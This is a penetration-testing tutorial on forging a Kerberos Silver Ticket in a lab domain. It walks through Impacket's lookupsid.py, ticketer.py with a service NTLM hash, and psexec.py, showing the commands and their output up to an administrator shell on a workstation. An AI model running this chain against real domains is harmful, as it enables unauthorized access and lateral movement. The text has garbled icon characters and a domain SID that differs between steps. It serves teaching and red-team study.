ποΈ Silver Ticket β
π What is a Silver Ticket ? β
A Silver Ticket is a forged Kerberos service ticket (TGS) that allows an attacker to authenticate to a specific service within a domain without interacting with the Key Distribution Center (KDC). Unlike a Golden Ticket, which provides full control over the entire domain by forging a TGT, a Silver Ticket targets individual services, such as HTTP, SMB, or LDAP, and bypasses domain-wide authentication mechanisms.
How Silver Tickets Work β
Kerberos uses service tickets (TGS) to authenticate users to individual services. These tickets are encrypted with the service account's NTLM hash (not the krbtgt hash, as in Golden Tickets). By compromising a service account and obtaining its NTLM hash, an attacker can forge a valid TGS, granting them access to that service.
π οΈ Crafting a Silver Ticket with Ticketer β
Impacket's Ticketer is a powerful Python-based tool used for crafting Kerberos tickets, including Silver Tickets, which grant access to specific services without contacting the Key Distribution Center (KDC). To create a Silver Ticket, the attacker needs the NTLM hash of the target service account and the domain SID.
1. Obtaining the Domain SID β
The SID (Security Identifier) is a unique value used to identify objects like users, groups, and computers within a Windows domain. It is essential for crafting a valid Golden Ticket, as it ensures the ticket can be authenticated within the correct domain. To retrieve the SID, we can use Impacketβs lookupsid.py tool by providing valid domain credentials :
lookupsid.py "red.lab"/'qu35t':'Password123'@"192.168.10.100" 0[*] Brute forcing SIDs at 192.168.10.100
[*] StringBinding ncacn_np:192.168.10.100[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-3433736088-161430583-35836265152. Crafting the Silver Ticket β
Once we have the necessary information, we can craft the Silver Ticket for the desired service. In this example, we will create a Silver Ticket for accessing the CIFS (SMB) service on a domain machine.
ticketer.py -nthash "da82fc64004dc986acb2b886f14565c5" -domain-sid "S-1-5-21-3433736088-161430583-3583626515" -domain "red.lab" -spn "cifs/wk01.red.lab" AdministratorImpacket v0.12.0.dev1+20240808.192004.154de8a5 - Copyright 2023 Fortra
[*] Creating basic skeleton ticket and PAC Infos
[*] Customizing ticket for red.lab/Administrator
[*] PAC_LOGON_INFO
[*] PAC_CLIENT_INFO_TYPE
[*] EncTicketPart
[*] EncTGSRepPart
[*] Signing/Encrypting final ticket
[*] PAC_SERVER_CHECKSUM
[*] PAC_PRIVSVR_CHECKSUM
[*] EncTicketPart
[*] EncTGSRepPart
[*] Saving ticket in Administrator.ccacheThis command generates a Silver Ticket for the CIFS service and saves it as a .ccache file, which can be used for Kerberos authentication.
3. Using the Silver Ticket β
Once the Silver Ticket is generated and saved in the .ccache file, we can load it into our current session using the following command :
export KRB5CCNAME=Administrator.ccacheAfter exporting the ticket, we can verify that the ticket is active by listing the Kerberos tickets with klist :
klistTicket cache: FILE:Administrator.ccache
Default principal: Administrator@red.lab
Valid starting Expires Service principal
09/22/2024 16:22:31 09/20/2034 16:22:31 cifs/wk01.red.lab@red.lab
renew until 09/20/2034 16:22:314. Accessing the Target Service β
With the Silver Ticket loaded, we can now access the target service without the KDC being involved. We can use psexec.py to authenticate and interact with the SMB service on the target machine:
psexec.py -k -no-pass "Administrator"@"wk01.red.lab"Impacket v0.12.0.dev1+20240808.192004.154de8a5 - Copyright 2023 Fortra
[*] Requesting shares on wk01.red.lab.....
[*] Found writable share ADMIN$
[*] Uploading file rYyyktki.exe
[*] Opening SVCManager on wk01.red.lab.....
[*] Creating service xjly on wk01.red.lab.....
[*] Starting service xjly.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.22621.1702]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\System32>